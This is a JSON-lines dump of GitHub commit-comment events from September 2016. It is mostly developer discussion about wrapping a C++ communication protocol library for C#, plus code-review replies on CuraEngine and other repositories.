{"id":"4594712807","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109756,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:15:14Z","updated_at":"2016-09-21T08:15:14Z","body":"CommNode is an abstract Class, we can still wrap it, but we will need to make a forwarder, another class that will act as the C# version of CommNode. You already did it, which is nice of you to do, but we will still need alittle more work on it."}},"created_at":"2016-09-21T08:15:14Z"}
{"id":"4594714770","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109760,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:15:41Z","updated_at":"2016-09-21T08:15:41Z","body":"ABSPacket is actually a C# version of AbstractPacket. Instead, it is holding an AbstractPacket in it."}},"created_at":"2016-09-21T08:15:41Z"}
{"id":"4594718220","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109789,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:16:26Z","updated_at":"2016-09-21T08:16:26Z","body":"AbstractPacketForwarder is the object that defines AbstractPacket, and it's being constructed through ABSPacket, which is why we can inherit it without too much problems."}},"created_at":"2016-09-21T08:16:26Z"}
{"id":"4594721545","type":"CommitCommentEvent","actor":{"login":"kumarAnuj"},"repo":{"name":"kumarAnuj/gadgets"},"payload":{"comment":{"id":19109830,"position":null,"line":null,"path":null,"commit_id":"4b5d36f38bc78d8bbd4af7b458e97a334fd735cb","created_at":"2016-09-21T08:17:13Z","updated_at":"2016-09-21T08:17:13Z","body":"hgh"}},"created_at":"2016-09-21T08:17:13Z"}
{"id":"4594721548","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109831,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:17:13Z","updated_at":"2016-09-21T08:17:13Z","body":"The real problem lies in the fact that when we inherit ABSPacket, we are not really inheriting AbstractPacket. This is why we can't use it in the native Comms object."}},"created_at":"2016-09-21T08:17:13Z"}
{"id":"4594722708","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109844,"position":54,"line":172,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T08:17:28Z","updated_at":"2016-09-21T08:17:28Z","body":"nope"}},"created_at":"2016-09-21T08:17:28Z"}
{"id":"4594723063","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109850,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:17:33Z","updated_at":"2016-09-21T08:17:33Z","body":"and that is why we have to redesign a C# version of Comms. "}},"created_at":"2016-09-21T08:17:33Z"}
{"id":"4594725310","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109878,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:18:04Z","updated_at":"2016-09-21T08:18:04Z","body":"Why event have the native class than"}},"created_at":"2016-09-21T08:18:04Z"}
{"id":"4594726117","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109889,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:18:14Z","updated_at":"2016-09-21T08:18:14Z","body":"For C++ of course lulz."}},"created_at":"2016-09-21T08:18:14Z"}
{"id":"4594727229","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"furzeface/a11y-demos"},"payload":{"comment":{"id":19109890,"position":5,"line":44,"path":"cognitive/index.html","commit_id":"4e85c9420cc67af1794b067f5bc8f17db1bc0fb1","created_at":"2016-09-21T08:18:30Z","updated_at":"2016-09-21T08:18:30Z","body":"Thanks @antplant :octocat: :shipit: "}},"created_at":"2016-09-21T08:18:30Z"}
{"id":"4594728578","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19109894,"position":null,"line":null,"path":null,"commit_id":"435736e3d2e29402fc48e22e4f16700fb1da5e24","created_at":"2016-09-21T08:18:49Z","updated_at":"2016-09-21T08:18:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1077](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13692&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 242, ignored: 3 Build time: 00:12:37"}},"created_at":"2016-09-21T08:18:49Z"}
{"id":"4594729714","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109896,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:19:05Z","updated_at":"2016-09-21T08:19:05Z","body":"Why even* keep the native class in there just make a new abstract"}},"created_at":"2016-09-21T08:19:05Z"}
{"id":"4594731928","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109898,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:19:34Z","updated_at":"2016-09-21T08:19:34Z","body":"because we will need it to pass from C# nodes to C++ nodes and so forth"}},"created_at":"2016-09-21T08:19:34Z"}
{"id":"4594732419","type":"CommitCommentEvent","actor":{"login":"zhang0137"},"repo":{"name":"nicescale/coreos-overlay"},"payload":{"comment":{"id":19109903,"position":null,"line":null,"path":null,"commit_id":"88154d3fb567811ff43d1b1b8b06d1a050645f7a","created_at":"2016-09-21T08:19:41Z","updated_at":"2016-09-21T08:19:41Z","body":"https://trello.com/c/r0e9d3gg/547--"}},"created_at":"2016-09-21T08:19:41Z"}
{"id":"4594735799","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109916,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:20:27Z","updated_at":"2016-09-21T08:20:27Z","body":"Remember the NGCP hash? That is the thing allowing for packets to be called though."}},"created_at":"2016-09-21T08:20:27Z"}
{"id":"4594737884","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109919,"position":84,"line":197,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T08:20:54Z","updated_at":"2016-09-21T08:20:54Z","body":"Ah duplication of `getLayerOutlines`.\r\nYes, but I'm going to leave that for now. It would be semantically really weird to have these two in one and the same function. It could also very well be that one of these functions need to apply an offset to these areas, while the other doesn't."}},"created_at":"2016-09-21T08:20:54Z"}
{"id":"4594739521","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109921,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:21:16Z","updated_at":"2016-09-21T08:21:16Z","body":"When you create a class in C# inheriting ABSPacket, it should still have the same hash if you sent it to a c++ version of Comms."}},"created_at":"2016-09-21T08:21:16Z"}
{"id":"4594740614","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109923,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:21:31Z","updated_at":"2016-09-21T08:21:31Z","body":"Ok"}},"created_at":"2016-09-21T08:21:31Z"}
{"id":"4594743955","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109928,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:22:12Z","updated_at":"2016-09-21T08:22:12Z","body":"So we will need to wrap most of the APIs, the stuff the user is definitely going to use."}},"created_at":"2016-09-21T08:22:12Z"}
{"id":"4594744876","type":"CommitCommentEvent","actor":{"login":"xBorderie"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":19109930,"position":null,"line":null,"path":null,"commit_id":"006dcbee13a492d0cad566dc9ea634e100fc8b00","created_at":"2016-09-21T08:22:22Z","updated_at":"2016-09-21T08:22:22Z","body":"@ficticius It is identical, but it uses tabs instead of spaces. Since then, [we adopted PSR-2](http://www.php-fig.org/psr/psr-2/), so these changes are indeed not needed anymore.\r\n\r\n@snelweg It seems this code was merged directly into the codebase. Are you not seeing it? Does it not [solve the issue](http://forge.prestashop.com/browse/PSCSX-3195)?"}},"created_at":"2016-09-21T08:22:22Z"}
{"id":"4594745344","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109932,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:22:28Z","updated_at":"2016-09-21T08:22:28Z","body":"this isn't an easy fate, but it's a start, and it will i promise you that."}},"created_at":"2016-09-21T08:22:28Z"}
{"id":"4594747425","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109939,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:22:57Z","updated_at":"2016-09-21T08:22:57Z","body":"It will work, but like i said, it will take some time before we get it working."}},"created_at":"2016-09-21T08:22:57Z"}
{"id":"4594750146","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109943,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:23:32Z","updated_at":"2016-09-21T08:23:32Z","body":"but we have to wrap the stuff we will definitely need to use in the C# library for C# Comms."}},"created_at":"2016-09-21T08:23:32Z"}
{"id":"4594752617","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109949,"position":5,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"92fca17411af6ba726c3933d4dc122495f3d8b09","created_at":"2016-09-21T08:24:04Z","updated_at":"2016-09-21T08:24:04Z","body":"I'm rounding the brim up, because that's safer.\r\nThe not fitting condition has to do with the last brim line. The brim area generated here will always fully be filled!\r\nI'll add a nice ASCII art picture :D"}},"created_at":"2016-09-21T08:24:04Z"}
{"id":"4594754359","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109951,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:24:28Z","updated_at":"2016-09-21T08:24:28Z","body":"I'll fix up CCommNode today, and wrap the Queue interfaces we will be using."}},"created_at":"2016-09-21T08:24:28Z"}
{"id":"4594755354","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109956,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:24:40Z","updated_at":"2016-09-21T08:24:40Z","body":"See if you can wrap the network stuff."}},"created_at":"2016-09-21T08:24:40Z"}
{"id":"4594756565","type":"CommitCommentEvent","actor":{"login":"stepsal"},"repo":{"name":"NeuroWinter/batch_wordpad_glitch"},"payload":{"comment":{"id":19109961,"position":null,"line":null,"path":null,"commit_id":"9561137f43f00407891fdb8fcef3723b5230da4c","created_at":"2016-09-21T08:24:57Z","updated_at":"2016-09-21T08:24:57Z","body":"i would much prefer if argpase was used and the the main function  was left as before\r\nhttps://docs.python.org/3/library/argparse.html"}},"created_at":"2016-09-21T08:24:57Z"}
{"id":"4594758963","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109965,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:25:26Z","updated_at":"2016-09-21T08:25:26Z","body":"Remember, just wrap the stuff you know for a fact you are going to use for C# Comms."}},"created_at":"2016-09-21T08:25:26Z"}
{"id":"4594763300","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19109979,"position":5,"line":5,"path":"tutu/app/models/railway_station.rb","commit_id":"9c8d240df7ff1c5531ecc4a8d27d7a3dcf4b78d6","created_at":"2016-09-21T08:26:23Z","updated_at":"2016-09-21T08:26:23Z","body":"Не может быть 2 ассоциации с одинаковым именем, последняя перезапишет первую. Надо сами ассоциации назвать по-другому, например, arrival_tickets и departure_tickets. Но раз название ассоциации и модели не совпадет, нужно еще явно указать опцию class_name"}},"created_at":"2016-09-21T08:26:23Z"}
{"id":"4594770337","type":"CommitCommentEvent","actor":{"login":"iandstanley"},"repo":{"name":"stereocats/jenniferbrickwell"},"payload":{"comment":{"id":19109993,"position":null,"line":null,"path":null,"commit_id":"ebf24fa5b6fdb9cec5c3abfd2eaa1df8af7b90e3","created_at":"2016-09-21T08:27:56Z","updated_at":"2016-09-21T08:27:56Z","body":"Fixes #181 "}},"created_at":"2016-09-21T08:27:56Z"}
{"id":"4594776395","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109999,"position":33,"line":64,"path":"src/raft.cpp","commit_id":"2db70b4b5ca1eae7443d305c0825338dd8a5be4b","created_at":"2016-09-21T08:29:14Z","updated_at":"2016-09-21T08:29:14Z","body":"Good catch. fixed"}},"created_at":"2016-09-21T08:29:14Z"}
{"id":"4594777924","type":"CommitCommentEvent","actor":{"login":"SagotG"},"repo":{"name":"SagotG/Domoleaf"},"payload":{"comment":{"id":19110001,"position":null,"line":null,"path":null,"commit_id":"62798a97358a4ff53301146595b3ead86ca3e39e","created_at":"2016-09-21T08:29:34Z","updated_at":"2016-09-21T08:29:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;YlbT9VKf&#x2F;32-dev-page-accueil-et-inscription\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dev Page Accueil et Inscription</a>"}},"created_at":"2016-09-21T08:29:34Z"}
{"id":"4594778308","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110005,"position":6,"line":13,"path":"src/raft.cpp","commit_id":"4607d0a8ad07b0a289e9b1d31541f96c26d8ba15","created_at":"2016-09-21T08:29:40Z","updated_at":"2016-09-21T08:29:40Z","body":"fixed"}},"created_at":"2016-09-21T08:29:40Z"}
{"id":"4594779465","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19110007,"position":null,"line":null,"path":null,"commit_id":"fc0658b942a4235d784674f9cd64d5cd70e42ba0","created_at":"2016-09-21T08:29:55Z","updated_at":"2016-09-21T08:29:55Z","body":"Did you maybe mean `QueenValueEg`? (Although that should not change too much!)"}},"created_at":"2016-09-21T08:29:55Z"}
{"id":"4594783227","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19110012,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:30:42Z","updated_at":"2016-09-21T08:30:42Z","body":"Gosh if only we had more than two people working on this..."}},"created_at":"2016-09-21T08:30:42Z"}
{"id":"4594783271","type":"CommitCommentEvent","actor":{"login":"030"},"repo":{"name":"weareinteractive/ansible-ufw"},"payload":{"comment":{"id":19110013,"position":null,"line":null,"path":null,"commit_id":"a856fc3d2327764995cad8d428744e4f66f63da2","created_at":"2016-09-21T08:30:43Z","updated_at":"2016-09-21T08:30:43Z","body":"+1"}},"created_at":"2016-09-21T08:30:43Z"}
{"id":"4594788175","type":"CommitCommentEvent","actor":{"login":"sirkay777"},"repo":{"name":"yaodianmi/Work5Leancloud"},"payload":{"comment":{"id":19110018,"position":null,"line":null,"path":null,"commit_id":"cbfe50150e807ac0ee25541dbcbd4ebf8ba8ab70","created_at":"2016-09-21T08:31:44Z","updated_at":"2016-09-21T08:31:44Z","body":"👍 "}},"created_at":"2016-09-21T08:31:44Z"}
{"id":"4594790790","type":"CommitCommentEvent","actor":{"login":"petecooper"},"repo":{"name":"textpattern/textpacks"},"payload":{"comment":{"id":19110021,"position":null,"line":null,"path":null,"commit_id":"c0c124f0ed8a6c393188eaac641cc20932b3ebc1","created_at":"2016-09-21T08:32:17Z","updated_at":"2016-09-21T08:32:17Z","body":"Excellent - thank you, @vanmelick - clarification appreciated.\r\n\r\nSorry for the extra work, @philwareham."}},"created_at":"2016-09-21T08:32:17Z"}
{"id":"4594794070","type":"CommitCommentEvent","actor":{"login":"uscitp-aarunasa"},"repo":{"name":"uscitp-aarunasa/itp125"},"payload":{"comment":{"id":19110029,"position":null,"line":null,"path":null,"commit_id":"2eb212182ae890b921f68a6ab6a13cee14c7b3dd","created_at":"2016-09-21T08:32:57Z","updated_at":"2016-09-21T08:32:57Z","body":"What I tried to do here regarding submission was: \r\n1. Take each of the three individual .py files and make them .py.7z using Keka. In this way, I gave them the appropriate password. \r\n2. Put them in a folder and compress that folder into a zip file which has no password. The individual documents inside are password protected. \r\n\r\nWhenever I tried to zip using Keka (so the zip file itself could be password protected and not just the individual files), it split them into three zip files. "}},"created_at":"2016-09-21T08:32:57Z"}
{"id":"4594797651","type":"CommitCommentEvent","actor":{"login":"davvid"},"repo":{"name":"EelcoHoogendoorn/jsonpickle"},"payload":{"comment":{"id":19110039,"position":null,"line":null,"path":null,"commit_id":"fed03d61bac350924629f3642adabe14c76e485e","created_at":"2016-09-21T08:33:41Z","updated_at":"2016-09-21T08:33:41Z","body":"Hey @EelcoHoogendoorn thanks for these changes.  I've merged your master branch into jsonpickle and was able to make most of the test suite python2-compatible as well.   cheers!"}},"created_at":"2016-09-21T08:33:41Z"}
{"id":"4594811799","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110069,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T08:36:40Z","updated_at":"2016-09-21T08:36:40Z","body":"Yep.\r\nAfter vidc patch commit I found H.265 10bit HW decoder work not good(look like color space issue). Maybe  LG used old media HAL driver. I just restore to stock vidc drivers.\r\n\r\nAnd i use your kernel meet modem down when phone restart, I disabled this bool properly to fix it.\r\nhttps://github.com/shminer/android_kernel_lge_g5/commit/21b8f72bb0edc7b0a7719e1cb72c13e75a5db1ea\r\n"}},"created_at":"2016-09-21T08:36:40Z"}
{"id":"4594815140","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110078,"position":12,"line":312,"path":"src/FffGcodeWriter.cpp","commit_id":"228b13c96c59592c176075daae290eb52b7e503c","created_at":"2016-09-21T08:37:21Z","updated_at":"2016-09-21T08:37:21Z","body":"That's quite unrelated to this issue, but interesting nonetheless.\r\nI don't see how a factory pattern prevents this. The wiki is not really helpful either.\r\n\r\nDo you construct a factory with little arguments and then call some extra parameter-setting functions?\r\nIf so, then how will you guarantee that all those functions are called?"}},"created_at":"2016-09-21T08:37:21Z"}
{"id":"4594817539","type":"CommitCommentEvent","actor":{"login":"rjgildea"},"repo":{"name":"dials/dials"},"payload":{"comment":{"id":19110081,"position":null,"line":null,"path":null,"commit_id":"2da9afa436aa59a6cedcf12216492dd14ef36d4d","created_at":"2016-09-21T08:37:53Z","updated_at":"2016-09-21T08:37:53Z","body":"The phil type could be the following to prevent invalid values being set:\r\n`.type = floats(size=3, value_min=0, value_max=1)`"}},"created_at":"2016-09-21T08:37:53Z"}
{"id":"4594820034","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110091,"position":30,"line":49,"path":"src/raft.cpp","commit_id":"ceff626d8774a0449a99000674fe3609d7199e9a","created_at":"2016-09-21T08:38:25Z","updated_at":"2016-09-21T08:38:25Z","body":"fixed.\r\n\r\nAirgap is used as is; all layers above the raft are shifted up"}},"created_at":"2016-09-21T08:38:25Z"}
{"id":"4594826716","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110105,"position":43,"line":71,"path":"src/SkirtBrim.cpp","commit_id":"379a3d54f12f4315161db1c8a54194c787c557c3","created_at":"2016-09-21T08:39:49Z","updated_at":"2016-09-21T08:39:49Z","body":"done"}},"created_at":"2016-09-21T08:39:49Z"}
{"id":"4594830249","type":"CommitCommentEvent","actor":{"login":"xantares"},"repo":{"name":"CGAL/cgal-swig-bindings"},"payload":{"comment":{"id":19110111,"position":null,"line":null,"path":null,"commit_id":"91d2c5e139d0d96217b21f9123b7a60e01164e84","created_at":"2016-09-21T08:40:33Z","updated_at":"2016-09-21T08:40:33Z","body":"@sloriot great!"}},"created_at":"2016-09-21T08:40:33Z"}
{"id":"4594837575","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/Citra"},"payload":{"comment":{"id":19110126,"position":null,"line":null,"path":null,"commit_id":"a671a254559bff4aa71e9e38dd31134c5a62d778","created_at":"2016-09-21T08:42:01Z","updated_at":"2016-09-21T08:42:01Z","body":"I'm trying to compile in mingw but need to know are use the best one, can get to 100% in mingw file compiled with codeblocks, then run into last 50 errors, must be using the wrongs files to do so..\r\n\r\nNeed to nip out back later, also you where right about the error on post 1995 gamepad, but I cannot replay there as I'm blocked from doing so."}},"created_at":"2016-09-21T08:42:01Z"}
{"id":"4594839323","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19110132,"position":null,"line":null,"path":null,"commit_id":"81614e20b73521a4e01f4833953b59ef088fb455","created_at":"2016-09-21T08:42:21Z","updated_at":"2016-09-21T08:42:21Z","body":"hahahaha"}},"created_at":"2016-09-21T08:42:21Z"}
{"id":"4594839928","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110134,"position":56,"line":84,"path":"src/SkirtBrim.cpp","commit_id":"379a3d54f12f4315161db1c8a54194c787c557c3","created_at":"2016-09-21T08:42:29Z","updated_at":"2016-09-21T08:42:29Z","body":"Hmm I found a compiler options:\r\n-Wsuggest-attribute=const"}},"created_at":"2016-09-21T08:42:29Z"}
{"id":"4594842365","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110138,"position":56,"line":84,"path":"src/SkirtBrim.cpp","commit_id":"379a3d54f12f4315161db1c8a54194c787c557c3","created_at":"2016-09-21T08:42:58Z","updated_at":"2016-09-21T08:42:58Z","body":"fixed first comment"}},"created_at":"2016-09-21T08:42:58Z"}
{"id":"4594846270","type":"CommitCommentEvent","actor":{"login":"sagar-acharya"},"repo":{"name":"alankarmore/gabicus"},"payload":{"comment":{"id":19110148,"position":null,"line":null,"path":null,"commit_id":"a85e1579a62623d5b5239187e4ecaac06ba789eb","created_at":"2016-09-21T08:43:47Z","updated_at":"2016-09-21T08:43:47Z","body":"Ok. I'll follow this from now onwards!\n\n\nSagar Acharya\n[+91-8793979572]\n[1470338585931_facebook.png]<https://www.facebook.com/bladebrakers>[1470338640572_twitter.png]<https://www.twitter.com/SaggyA>[1470338655086_linkedin.png]<https://www.linkedin.com/in/imsagar>[1470338601267_skype.png]<https://is.gd/LgkhyR>\n[1470338683360_wordpress.png]<http://blog.sagaracharya.com>[1470338692756_instagram.png]<https://www.instagram.com/new_sagar>[1470338663955_github.png]<https://github.com/sagar-acharya>\n\n\n\n________________________________\nFrom: alankarmore <notifications@github.com>\nSent: Wednesday, September 21, 2016 1:26 PM\nTo: alankarmore/gabicus\nSubject: Re: [alankarmore/gabicus] Merge pull request #3 from alankarmore/user_registration (a85e157)\n\n\nGood one. FYI:\nBelow are some guidelines you have to follow from next time.\n\n  *   Always use braces for control structures. Even if it is a single if condition\n  *   Always add extra line after every } brace of control structures (if,for,while,switch..case etc)\n  *   Use static values on left had side as $(this).val()=='employee' ---- 'employee' == $(this).val()\n  *   There should be space between operands and operators.\n  *   Do Not commit commented code.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/alankarmore/gabicus/commit/a85e1579a62623d5b5239187e4ecaac06ba789eb#commitcomment-19109533>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AHE5CCyiLaiAOwwEVRz28P64ldPU1WOlks5qsOMggaJpZM4KCgMs>.\n"}},"created_at":"2016-09-21T08:43:47Z"}
{"id":"4594846620","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19110149,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:43:52Z","updated_at":"2016-09-21T08:43:52Z","body":"@MichaelWallace30 \r\nOh you were talking about the C# Wrapped native Comms... Yea we don't need it."}},"created_at":"2016-09-21T08:43:52Z"}
{"id":"4594847227","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110153,"position":null,"line":null,"path":null,"commit_id":"cc650542018a216e1af66982885877a68cd80a16","created_at":"2016-09-21T08:43:59Z","updated_at":"2016-09-21T08:43:59Z","body":"Camera not focus.\r\nlg-devs moved some firmware to /etc/firmware, but stock rom still use /system/media/*.bin"}},"created_at":"2016-09-21T08:43:59Z"}
{"id":"4594847286","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/frameworks_base"},"payload":{"comment":{"id":19110154,"position":4,"line":94,"path":"packages/SystemUI/src/com/android/systemui/statusbar/BaseStatusBar.java","commit_id":"e2bf4162a936dbc5ea014e21efb90b766d38c20b","created_at":"2016-09-21T08:44:00Z","updated_at":"2016-09-21T08:44:00Z","body":"Fark @1KX2 what's this?"}},"created_at":"2016-09-21T08:44:00Z"}
{"id":"4594848121","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19110156,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:44:10Z","updated_at":"2016-09-21T08:44:10Z","body":"It will still work (the C# to C++ packet sending) regardless.."}},"created_at":"2016-09-21T08:44:10Z"}
{"id":"4594849661","type":"CommitCommentEvent","actor":{"login":"MysticDoll"},"repo":{"name":"MysticDoll/school2016late"},"payload":{"comment":{"id":19110161,"position":null,"line":null,"path":null,"commit_id":"8ad4d4daa82847a82e582396d17af9c59721eeac","created_at":"2016-09-21T08:44:28Z","updated_at":"2016-09-21T08:44:28Z","body":"hoga@rs.kagu"}},"created_at":"2016-09-21T08:44:28Z"}
{"id":"4594849866","type":"CommitCommentEvent","actor":{"login":"marinalimeira"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19110162,"position":null,"line":null,"path":null,"commit_id":"0bb3d108f4e64bb7f108c31bd1b900dd6d4f753d","created_at":"2016-09-21T08:44:30Z","updated_at":"2016-09-21T08:44:30Z","body":"O termo utilizado é `rotas`. Atualizei."}},"created_at":"2016-09-21T08:44:30Z"}
{"id":"4594850516","type":"CommitCommentEvent","actor":{"login":"marinalimeira"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19110164,"position":null,"line":null,"path":null,"commit_id":"62ec65f5391f6560a5a5476b769fd518c10a1b36","created_at":"2016-09-21T08:44:39Z","updated_at":"2016-09-21T08:44:39Z","body":"Atualizei.\r\n\r\nComo não existe passo 4 nessa página, ficou meio estranho mesmo..."}},"created_at":"2016-09-21T08:44:39Z"}
